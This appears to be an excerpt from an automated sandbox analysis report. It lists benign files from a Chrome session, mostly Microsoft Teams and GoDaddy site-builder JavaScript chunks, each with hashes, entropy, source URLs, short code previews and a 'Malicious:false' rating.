                                                                                                                                                                                                                          SHA-256:D483B2A08866685564D04498B99A02C03D2A2690F4F2A03E78E062AA761FD44B
                                                                                                                                                                                                                          SHA-512:5004261B5BF175EBAD0D50C794957AFD8FAE1E92B86D4BAF8B48BEB0C540FBE62FA36A7348B0ECA2C40457FAEFBB4AC8F7ABC2C42CCDC7D1D4DE8EBD658B7740
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/602438-e94806bc95e51c6b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[602438],{562341:(e,t,n)=>{n.d(t,{V:()=>r});var o=n(953543),r=function(e){return{attributes:{root:{role:"button"===e.as?void 0:"button",tabIndex:"button"===e.as||e.disabled?void 0:0,disabled:"button"===e.as?e.disabled:void 0,"aria-disabled":e.disabledFocusable}},keyActions:{root:Object.assign({},"button"!==e.as&&"a"!==e.as&&{performClick:{keyCombinations:[{keyCode:o.rC.Enter},{keyCode:o.ZG}]}})}}}},928879:(e,t,n)=>{n.d(t,{Z:()=>c});var o=n(55543),r=n.n(o),i=n(666293),a=n.n(i),s=n(953543),c=function(e){var t,n,o=a()(e.on)?e.on:[e.on],i=e.tabbableTrigger?{tabIndex:u("tabIndex",e,0)}:void 0;i&&(i["aria-haspopup"]=null!=(t=e.trigger)&&t.props.hasOwnProperty("aria-haspopup")?null==(n=e.trigger)?void 0:n.props["aria-haspopup"]:"dialog");return{attributes:{trigger:Object.assign({},i),popup:{role:e.trapFocus?"dialog":e.inline?void 0:"complementary","aria-modal":!!e.trapFocus||void 0,"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36103)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36211
                                                                                                                                                                                                                          Entropy (8bit):5.261480504529277
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:vFORCEcOC/BExYLil95/8ZpA2Me/vDwYNtvE:vVZNLie73ZtvE
                                                                                                                                                                                                                          MD5:7F5787BE53067A2AD5210A29F8E320F9
                                                                                                                                                                                                                          SHA1:B6A10C98183301615C2C8350B537793049940A96
                                                                                                                                                                                                                          SHA-256:B85FC31F32AC2F798BBBE739B1D0CD3D199DBFA2D92F86C0159EF4FB2520CBD4
                                                                                                                                                                                                                          SHA-512:E0E3662E5AC05FADF7F25D1639617B5DD31ECF5CD37142B81F64AF9FEC1B61BBCE1B3B911D2AD303E11BCB395325051D941814D2663D9764038552E2C8AF4281
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712315],{805627:function(e,t,n){var o,r=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])},function(e,t){function n(){this.constructor=e}o(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)});Object.defineProperty(t,"__esModule",{value:!0});var i,s=n(535817),a=n(337315),l=function(){function e(e){this._formatter=e||new c}return e.prototype.formatter=function(){return this._formatter},e.prototype.receiveAll=function(){return!1},e.prototype.levels=function(){return null},e}();function u(e){return(4294967296+e).toString(16).substr(-8)}function f(e,t){return(1e12+e).toString(10).substr(-t)}t.AbstractLogAppender=l,function(e){e[e.Timestamp=1]="Timestamp",e[e.Component=4]="Component",e[e.Level=8]="Level",e[e.FullDate=32]="FullDate",e[e.Lo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (29343)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):29451
                                                                                                                                                                                                                          Entropy (8bit):5.2658132803400886
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BgErDRxmNsJwEtTkst3pWbyRgGDEksG0JsYTCk84PzQDsS4Tipyt1nYbo:N3RxmNs7hkxy3hsNJcJgr
                                                                                                                                                                                                                          MD5:59E0FBEB3A39FE773441F4B7CAC3E7E0
                                                                                                                                                                                                                          SHA1:0ACE00DDB87FCEBF156D254B06ABDE95E799EFE3
                                                                                                                                                                                                                          SHA-256:E6C9294A98216CBFB2C4189AA7BBF9FA01A820D28DC61DD1531BCE2A6F389B5B
                                                                                                                                                                                                                          SHA-512:441EE99881ACE88697CF3DB9F7C7F5D7DF78918D6C798E46C73791405CBBF0C7BF4ACEB176C36D25055C13389B4C284D0D2BA6A8EFAFCBD3F23806CAD0497F6C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/657660-4776a55841f4d594.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[657660],{469218:(e,t,i)=>{var r;i.d(t,{f:()=>I}),function(e){e.p720="720p",e.p1080="1080p",e.p2k="2k",e.p4k="4k",e.unkown="unkown"}(r||(r={}));const s=2073600,n=3686400,a=8294400;async function o(e){const t={Perf_Screen:void 0};let i;const o=e.screen.availWidth*e.screen?.availHeight;return i=o<s?r.p720:o>=s&&o<n?r.p1080:o>=n&&o<a?r.p2k:o>=a?r.p4k:r.unkown,t.Perf_Screen={width:e.screen?.availWidth,height:e.screen?.availHeight,resolution:i,dpr:e.devicePixelRatio},Promise.resolve(t)}var c;!function(e){e.Initializing="Initializing",e.Unrecoverable="Unrecoverable",e.LongInactive="LongInactive",e.Inactive="Inactive",e.Active="Active",e.VeryActive="VeryActive"}(c||(c={}));var l=i(492090),p=i(332752),d=i(34655),h=i(873529),u=i(464122);async function m(e,t,i){const r={workers:[],processes:[],windows:[]},s=await(e?.loadModule("heartbeat"));if(!s?.getPerfMetrics)return r;const n=r;try{l
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5317)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):5425
                                                                                                                                                                                                                          Entropy (8bit):4.510492774043985
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:W5jzKZX9doTTJgVyQHWrGc+6EsKrz5TQcy506rEGpQmFwgLm1XFwHM8+gIo4uIEi:iQ/iw5M1506rNIMpX+gvxrCT
                                                                                                                                                                                                                          MD5:EB7D33F4299E9BF95AFF1CC7FD32D4F1
                                                                                                                                                                                                                          SHA1:9A290ED2C80EE7F68E4E1A7A9EA4414FA97FEB03
                                                                                                                                                                                                                          SHA-256:9B564293076EC3C532C8B1F744D93366B6E6FFBE75737597ED56F5725DD89E7F
                                                                                                                                                                                                                          SHA-512:9A9ACC57568928710FC19A3E505DCBCFAAEFAEEDDFEE36AAB7E87600E43BF6062EB0125AB6747FDCBBEC65AE0D6D9DB1A3795C987882DCD98B3199C6277F2215
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/924039-ece960d105d7bb44.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[924039],{924039:(a,l,c)=>{c.d(l,{ZRL:()=>Z,TL0:()=>v,Co_:()=>e,Y$h:()=>A,xEh:()=>H,uGR:()=>M,A$C:()=>i,hs2:()=>V,tHQ:()=>m,pi9:()=>L,Dn5:()=>n});var h=c(693935);const Z=(0,h.U)("Vote20Filled","20",["M13.5 9h-1.27l1.73-3a1 1 0 0 0-.36-1.37L11 3.13a1 1 0 0 0-1.37.37l-2.5 4.33A1 1 0 0 0 7.26 9H6.5a.5.5 0 0 0 0 1h7a.5.5 0 0 0 0-1Zm-3-5 2.6 1.5L11.08 9H9.16L8 8.33 10.5 4Zm4.04 3-.58 1h.54l2.25 3H3.25L5.5 8h.4a1 1 0 0 1 .08-.17L6.46 7H5.5a1 1 0 0 0-.8.4l-2.5 3.33a1 1 0 0 0-.2.6V16a1 1 0 0 0 1 1h14a1 1 0 0 0 1-1v-4.67a1 1 0 0 0-.2-.6L15.3 7.4a1 1 0 0 0-.76-.4Z"]),v=(0,h.U)("Vote20Regular","20",["M12.23 9h1.27a.5.5 0 0 1 0 1h-7a.5.5 0 0 1 0-1h.76a1 1 0 0 1-.13-1.17l2.5-4.33A1 1 0 0 1 11 3.13l2.6 1.5A1 1 0 0 1 13.96 6l-1.73 3Zm.87-3.5L10.5 4 8 8.33 9.16 9h1.92l2.02-3.5Zm.86 2.5.58-1a1 1 0 0 1 .76.4l2.5 3.33a1 1 0 0 1 .2.6V16a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1v-4.67a1 1 0 0 1 .2-.6L4.7 7.4a
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):73389
                                                                                                                                                                                                                          Entropy (8bit):5.302603730388669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:prYXUP+dcYtaNHGuq+WMcjETBn+UfZ3EQ00LqEIiE66+Hdv8//iHJ4RcWX:hYXU2GZx5yKnDLKAE7RcI
                                                                                                                                                                                                                          MD5:B1363ACAF4176F1D3ADA9B2485B9318E
                                                                                                                                                                                                                          SHA1:4C1A23CEC7DB2F3BF30B8E6AC0EB0BEEEA5C130F
                                                                                                                                                                                                                          SHA-256:F0422E5E5F85C63C20756D6799C092BEF007D15B4E28F98CF8D30F00C74BA40E
                                                                                                                                                                                                                          SHA-512:2E4D1EA792F5DB1ECC4954B2B054A32722704448D1638567063ACB5BFC21A4AEDDF7B069392B97DDF385F005E1D8921CA5F745E62E163FCEA49A3444EA278F55
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/492696-90f4127f742d63a7.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[492696],{589708:(e,t,a)=>{a.d(t,{j:()=>$});var r=a(802756),i=a(60214),o=a(625292),n=a(923226),s=a(848020),c=a(448211),d=a(510139),u=a(935008),l=a(366603),h=a(48410),g=a(191914),_=a(955262),m=a(417694),p=a(847431),S=a(703478);const A=(e,t)=>(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:(0,d.Nw)(e),correlationId:t}),v=(e,t,a,r)=>{if(r?.("enablePostMessageAuthentication")&&t.hasPostMessageAgent){const t=e.postMessageConfig;if(!t)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:"When enabling post message based authentication, postMessageConfig must be provided in the experience configuration.",correlationId:a});if(0===t.length)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderL
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (829)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):876
                                                                                                                                                                                                                          Entropy (8bit):5.561256771975726
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:cEBLv5pqMIuHMnH7cmo17Jv0ySaUKdei9hJQE2HrIYpb:f75pqaowmWJcySaUKdTfcrIC
                                                                                                                                                                                                                          MD5:9219CF782ED219BD3929A51E99503BC2
                                                                                                                                                                                                                          SHA1:6AAC399854EC0405949566FAFDCA8C121F0CDA58
                                                                                                                                                                                                                          SHA-256:89388608D7BCECED5AD74231681FFCE822AD580ACB9FD7E492970176E3E38347
                                                                                                                                                                                                                          SHA-512:D421851026422D46E1561FA852084CE7B41E32C7451DCF85900838265D330F09389DA18F4D8A5FAF3E0A4076508BA7E93EA9C5F8B5B32ACF32205C9B6E65E709
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-index-4e26cd6b.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index-4e26cd6b.js",["exports"],(function(o){"use strict";const{widgetTypes:e,colorPackCategories:t,themeConstants:n,buttons:l}=(global.Core||guac["@wsb/guac-widget-core"]).constants,s=(global.keyMirror||guac.keymirror)({NONE:null,SMALL_UNDERLINE:null,FULL_UNDERLINE:null,INLINE:null}),i=24,r=n.DEFAULT_OVERLAY_TEXT_SHADOW,a={about4:i,introduction5:i,content5:i,ordering1:i,payment2:i,zillow1:i,reviews1:i,rss1:i,subscribe3:i,mlsSearch1:i,contact10:i,countdown1:i,quote1:i},c={spotlight:{fill:l.fills.SOLID},external:{fill:l.fills.NONE,decoration:l.decorations.NONE,shadow:l.shadows.NONE}};o.A="365px",o.B="24px",o.C=c,o.D=25,o.I=28,o.M=40,o.O="0px 2px 10px rgba(0, 0, 0, 0.3)",o.S=40,o.W={about1:!0},o.a=r,o.b="18px",o.c=a,o.d="600px",o.e=t,o.s=s})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-index-4e26cd6b.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):488546
                                                                                                                                                                                                                          Entropy (8bit):5.627318568051973
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:i/JNz8JPeINQKxlLdgK5EkZyTdTIxVhl3qaMZZ2H+LLIIHW0F:45KCkZ7r3qaMZZ2H+LLIIHn
                                                                                                                                                                                                                          MD5:59CB1B0DCFFAFDC09EDB8D088D756A86
                                                                                                                                                                                                                          SHA1:0DD58AA9FEBAACE29839418E4D5D8C12FBE253DB
                                                                                                                                                                                                                          SHA-256:52C61243F0C75D908D691EEF58E6DFB3FA49D6A19F02040C20DB452D98E3676D
                                                                                                                                                                                                                          SHA-512:FC6584D069EA5D4D412F2E5C95BA72D51D669F5CF99E6EB9AC74CC2E0A2EAA0F95CDBC9C704E8A5548D421B1702B51BDE3938950046701CA6E8D387004EFB186
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725236],{744465:(module,__unused_webpack_exports,__webpack_require__)=>{var f;f=function(){var define,module,exports;return function e(o,t,r){function n(i,a){if(!t[i]){if(!o[i]){if(d)return d(i,!0);var g=new Error("Cannot find module '"+i+"'");throw g.code="MODULE_NOT_FOUND",g}var s=t[i]={exports:{}};o[i][0].call(s.exports,(function(e){return n(o[i][1][e]||e)}),s,s.exports,e,o,t,r)}return t[i].exports}for(var d=void 0,i=0;i<r.length;i++)n(r[i]);return n}({1:[function(require,module,exports){(function(global){(function(){var $jscomp=$jscomp||{};$jscomp.scope={},$jscomp.createTemplateTagFirstArg=function(e){return e.raw=e},$jscomp.createTemplateTagFirstArgWithRaw=function(e,o){return e.raw=o,e},$jscomp.arrayIteratorImpl=function(e){var o=0;return function(){return o<e.length?{done:!1,value:e[o++]}:{done:!0}}},$jscomp.arrayIterator=function(e){return{next:$jscomp.arrayIteratorImpl(e)}},$jsco
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18896)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19004
                                                                                                                                                                                                                          Entropy (8bit):5.306974413145656
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:G4AQE0IXIfeJgWCljWwXS+YuD/CEz5p+ZExpUZKVDziCzxA5R2qe9RoqrS:u0lWCrD/CEdHi9PT
                                                                                                                                                                                                                          MD5:C685FFC1C5CE457B25393165744C7D08
                                                                                                                                                                                                                          SHA1:6469598AEFA52571D810FF03E52F00676D8C4F6D
                                                                                                                                                                                                                          SHA-256:686C2F561FFC20EB44E792F2F5F477409B029F2F4AEB7EF832E211AFB1691F62
                                                                                                                                                                                                                          SHA-512:FE85EEB7E62B7ECE8192FFD481C93CBBB80CC2C3E135F8EEB8E40E07FC605DE831C028F9EDBCA0304B351169347426A63FC6015C4E637CE46ED32B302A0DC273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[534940],{796767:(e,t,n)=>{n.d(t,{S:()=>i});var a=n(953543),r=n(504405),i=function(e){var t;return{attributes:{wrapper:{role:"presentation","data-tabs":"true"},root:(t={role:"tab",tabIndex:0,"aria-selected":!!e.active,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-controls":e["aria-controls"],"aria-disabled":e.disabled},t[r.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]}}}}}},584667:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(888846),r=n(796767),i=function(){return{attributes:{root:{role:"tablist"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:r.S}}}},510533:(e,t,n)=>{n.d(t,{FN:()=>G,ih:()=>H,LA:()=>D});var a=n(112882),r=n.n(a),i=n(109161),o=n.n(i),s=n(936666),l=n(953543),c=function(e){return{att
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 16x18, components 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):623
                                                                                                                                                                                                                          Entropy (8bit):5.377546199918632
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:SPb3SkEl9uuKc150XyoseupobLA7ahlIYBHRB7WGZx92h:/lCc1spupobMahlp9RB7X+
                                                                                                                                                                                                                          MD5:3EABAEF8C0599E07F0EC84E819CBBD8F
                                                                                                                                                                                                                          SHA1:D5AFA0E32F166451B9E79115D36807061ECD0EC2
                                                                                                                                                                                                                          SHA-256:34CE1952AE00F67492EFE733D02378F70D1EB7B455EA00029B2CF62BB3F52AB4
                                                                                                                                                                                                                          SHA-512:672B6B7F0166E8A95AE4DC1FB20C2F9B360ED01B7753C89F90A6420D7EED2A125623BF27F2A51B1C739698B3EE843E8E7B190C61C99EB6AE8D23AAB062AD685D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100...........................................C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."....................................*.........................!2BR..#$%CQas.............................'.........................Q....!12Da..............?...r.T..HA.=..-.......M.+..1Ka..%.Sc.P.L.tV`.....x.....)...)..LWE.:.O..\X..V...i.8..l&.Q..v~..L.X.`.?hB..n...=.]1.}...
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1114306
                                                                                                                                                                                                                          Entropy (8bit):5.412208612179107
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:NDU5MrQ4hY8NZEwdTcFNmVoEvzafBhxaVvgNPENd1lBgp2zuMlW95+EL:8EVLvzlVvgNPENd1lWlbj
                                                                                                                                                                                                                          MD5:BA99224E501FF83669493CD37B3A06E7
                                                                                                                                                                                                                          SHA1:0A070AE1C269C1A1B49A90527D19F6FB7875F898
                                                                                                                                                                                                                          SHA-256:CA999166674C6057770EF9C5AFE3FAC8B6D56BFB96A86FF56E91F2F598BAF351
                                                                                                                                                                                                                          SHA-512:61FEB6075EDEBB1E3B77ADE34E1F13F1A00EC7D8DF83E9B1185FCACD9DC63F70C48A38FBDBA96B6C1A7719190CC03AB444548A7E6BEC160934019D05C407FED5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/config-prod-7274dc51e5177220.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[426009],{937148:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={configs:{auth:{enableAuthV2:[{value:!0}],enableMsal2:[{platform:[1454,1415],value:!0},{value:!0,platform:[1454,1415]}],caeEnabledResources:[{value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://outlook.office.com","https://ic3.teams.office.com","sharepoint","presence"]}],criticalResources:[{platform:[50,51,49],value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://ic3-non-cae.teams.office.com","https://ic3.teams.office.com","https://outlook.office.com/search","https://presence.teams.microsoft.com/","https://noam.presence.teams.microsoft.com/","https://emea.presence.teams.microsoft.com/","https://apac.presence.teams.microsoft.com/","https://presence.gcc.teams.microsoft.com/","https://noamdf.presence.teams.microsoft.com/"]},{value:["https://api.sp
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14080)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14188
                                                                                                                                                                                                                          Entropy (8bit):4.548444802364332
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:morrVCmTcgu/dwwIXxmpnNnkkdYv+WRFqFK/WP5MABOH8P2oKullWqFjhRONOb+t:morrVrcgAIXxmEv+WDJw5MAB+B2hRcJt
                                                                                                                                                                                                                          MD5:EAE6D5D8A335D7E78B87A584045664BE
                                                                                                                                                                                                                          SHA1:16F37B3649C086DBC522F19D34C88F135DD62886
                                                                                                                                                                                                                          SHA-256:332670B50B9E5C00C333394FE7F1660E95B91A3BAC311A32B07C4623AD014BED
                                                                                                                                                                                                                          SHA-512:D26C7E0204E471EDFED62FCCD2384B74C70F40097BB0D9C03045279D277F61FD3B3B851B0037E8BE4A046A810D99650EA53A2722BCDE08F6BBD6AF85E1E05C74
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/499319-ba112383185f5946.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[499319],{499319:(a,l,c)=>{c.d(l,{fG6:()=>Z,emQ:()=>h,T$n:()=>r,Tw6:()=>m,nzA:()=>C,t3G:()=>L,kNP:()=>M,mXP:()=>U,CDg:()=>g,jvo:()=>u,FUA:()=>R,N5_:()=>A,orE:()=>o,SUw:()=>k,D7b:()=>n,xZD:()=>t,RaO:()=>i,FHz:()=>v,ghe:()=>s,kt0:()=>H,ZmR:()=>b,i3f:()=>d,pgR:()=>w,GxZ:()=>F,hoY:()=>p,rLf:()=>D,geq:()=>_,cmU:()=>V,sCR:()=>f,bP_:()=>G,nbA:()=>P,ba0:()=>S,nb6:()=>q,KOR:()=>N,qGP:()=>O,g4$:()=>x,nbk:()=>z,NaX:()=>Q,Aow:()=>T,s81:()=>X,oIL:()=>$,gcA:()=>j,qrO:()=>B,mse:()=>E,JcD:()=>I});var e=c(693935);const Z=(0,e.U)("ChannelShare20Regular","20",["M3 5.5A2.5 2.5 0 0 1 5.5 3h5A2.5 2.5 0 0 1 13 5.5a.5.5 0 0 1-1 0c0-.83-.67-1.5-1.5-1.5h-5C4.67 4 4 4.67 4 5.5v5c0 .83.67 1.5 1.5 1.5h4.51a2.25 2.25 0 1 1 .12 1H5.5A2.5 2.5 0 0 1 3 10.5v-5Zm8 6.75a1.25 1.25 0 1 0 2.5 0 1.25 1.25 0 0 0-2.5 0ZM7.5 14a.5.5 0 0 0-.5.5A2.5 2.5 0 0 0 9.5 17h5a2.5 2.5 0 0 0 2.5-2.5v-5A2.5 2.5 0 0 0 14.5 7H9.87A2.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7947)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8055
                                                                                                                                                                                                                          Entropy (8bit):5.29510191086443
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:QxM0ytizz70XhjrgRn7Ekl12Tuyd6yxfoxG3wjs:uM0WUwXhf+IklI6yAydoxG3wA
                                                                                                                                                                                                                          MD5:D35255ECAC13D3B01B9EC8529DB26D0D
                                                                                                                                                                                                                          SHA1:ADB216D48717FC781924DEAD0349C7F349F71E7B
                                                                                                                                                                                                                          SHA-256:B246BC7FDE6806B27422C4979EA2C0692752402830BD2B1DAD1744896D5698D4
                                                                                                                                                                                                                          SHA-512:472ABAC0B5FD797A352473ABCCF561EF2DAC714EF2FF90CFC11224EB187E389E9FDBA478566608B13EA6EA912680AB007FA9F6885D06D80AEBA37C640537A0E7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981462],{981462:(e,t,i)=>{i.d(t,{v:()=>R});var n=i(203557),r=i(407845),o=i(405501),a=i(953760);const s={...i(965991).MX,PairwiseBrokerApplicationInitializeBrokering:"pairwiseBrokerApplicationInitializeBrokering",BrokerClientApplicationHandleBrokerHandshake:"brokerClientApplicationHandleBrokerHandshake",BrokerClientApplicationBrokeredSSOSilentRequest:"brokerClientApplicationBrokeredSSOSilentRequest",BrokerClientApplicationBrokeredSilentRequest:"brokerClientApplicationBrokeredSilentRequest",EmbeddedClientApplicationSendSSOSilentRequest:"embeddedSSOSilent",EmbeddedClientApplicationSendPopupRequest:"embeddedPopup",EmbeddedClientApplicationSendRedirectRequest:"embeddedRedirect",EmbeddedClientApplicationHandleRedirectRequest:"embeddedHandleRedirect",EmbeddedClientApplicationSendSilentRefreshRequest:"embeddedSilentRefresh"},l=new Map([[s.PairwiseBrokerApplicationInitializeBrokering,
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1211)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1261
                                                                                                                                                                                                                          Entropy (8bit):5.340315611373646
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:/BLEQuC0F6lq5lEYwy5WqogVeESgVeId4PXsHrIW:Z4jFYq5lpwW7vdd4PXgrIW
                                                                                                                                                                                                                          MD5:CB9BFA0FBDD957FBE7F4841B70341DB2
                                                                                                                                                                                                                          SHA1:9CAD12A3580D3E4D340CB867E88B687C75564C5A
                                                                                                                                                                                                                          SHA-256:513864FD4EBD1926F3E1E78B436A90C2BC3A5D16835B50415E7B318D7DEEC2A2
                                                                                                                                                                                                                          SHA-512:DF98C3262F64DA4EA9CACF75FF7CB685D71B69142D89F726AB3E13CF6F25432DC395D7C0950E1632F0E519F135B02FDA0753739189E51F1C9210ACA6692551DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/ColorSwatch-4196a0a9.js",["exports"],(function(e){"use strict";const o=e=>{let{color:o,isActive:t,inStock:r,isSmall:l}=e;const a=r||void 0===r,c=l?"24px":"38px",n=l?"20px":"32px",i={borderRadius:"50%",borderWidth:"1px",borderStyle:"solid"},s={outer:{...i,display:"flex",alignItems:"center",justifyContent:"center",width:c,height:c,borderColor:t?"lowContrast":"transparent"},inner:{...i,borderColor:"ultraLowContrast",color:"ultraLowContrast",width:n,height:n,background:a?o:`linear-gradient(to left top, ${o} calc(50% - 1px), currentColor, ${o} calc(50% + 1px) )`}};return(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.outer},(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Block,{style:s.inner}))};o.propTypes={color:(global.PropTypes||guac["prop-types"]).string.isRequired,isActive:(global.PropTypes||guac["prop-types"]).bool,inStock:(
